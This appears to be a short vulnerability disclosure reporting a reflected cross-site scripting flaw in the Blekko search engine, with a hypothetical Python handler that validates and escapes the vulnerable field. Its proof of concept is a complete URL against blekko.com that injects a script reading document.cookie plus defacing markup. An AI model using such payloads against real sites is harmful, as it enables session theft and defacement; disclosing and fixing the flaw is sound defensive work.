A hacker, Sony, reported a new XSS vulnerability in blekko.com, a web search engine. Blekko is a web search engine whose goal is to provide better search results than those offered by Google Search, by offering results culled from a set of 3 billion trusted websites and excluding material from such sites as content farms. The site, launched to the public on November 1, 2010, uses slashtags to provide results for common searches.
PoC:
http://blekko.com/tag/profile?m=1&email=editpro%2540bk.ru&name=&desc=&website=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cimg%20src=%20http://www.tnr.com/sites/default/files/imagecache/thumbnail_landing/RomaniaFlag.jpg%20align=center%3E%3Cmarquee%20scrollamount=%223%22%3ESystem%20Error..well,%20joke,%20it%27s%20only%20xss..We%20can%20see%20Cross%20Site%20Scripting%20on%20the%20Blekko%20-%20web%20search%20engine.%20By%20Sony.%20http://st2tea.blogspot.com%3C/marquee%3E
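The PoC carries markup in the `website` query parameter, and that markup is reflected into the profile page without encoding. The following is an added example, not Blekko's code: a hypothetical handler for that field that accepts only plain http(s) URLs and HTML-escapes whatever it writes back. The function names, the rendered markup, and the shortened sample query are assumptions constructed for illustration.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed sample: the PoC's query string, shortened to its script payload.
SAMPLE_QUERY = ("m=1&name=&desc=&website="
                "%3Cscript%3Ealert%28document.cookie%29%3C/script%3E")

ALLOWED_SCHEMES = {"http", "https"}
FORBIDDEN_CHARS = "<>\"'` \t\r\n"


def clean_website(value):
    """Return value if it is a plain http(s) URL with a host, else None."""
    value = value.strip()
    if not value or any(c in value for c in FORBIDDEN_CHARS):
        return None
    try:
        parts = urlsplit(value)
    except ValueError:  # malformed input such as an unclosed IPv6 bracket
        return None
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.hostname:
        return None
    return value


def render_website_field(query):
    """Hypothetical renderer for the profile's website field."""
    params = parse_qs(query, keep_blank_values=True)
    raw = params.get("website", [""])[0]
    url = clean_website(raw)
    if url is None:
        # Rejected input is echoed only after HTML encoding, never raw.
        return ('<span class="error">Invalid website: %s</span>'
                % html.escape(raw, quote=True))
    safe = html.escape(url, quote=True)  # safe in attribute and text context
    return '<a href="%s" rel="nofollow noopener">%s</a>' % (safe, safe)


if __name__ == "__main__":
    print(render_website_field(SAMPLE_QUERY))
    print(render_website_field("website=http%3A%2F%2Fexample.org%2F"))
```

Validation alone is not the fix: the escaping on output is what keeps a rejected or unexpected value from being interpreted as markup.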
source:
st2tea.blogspot.com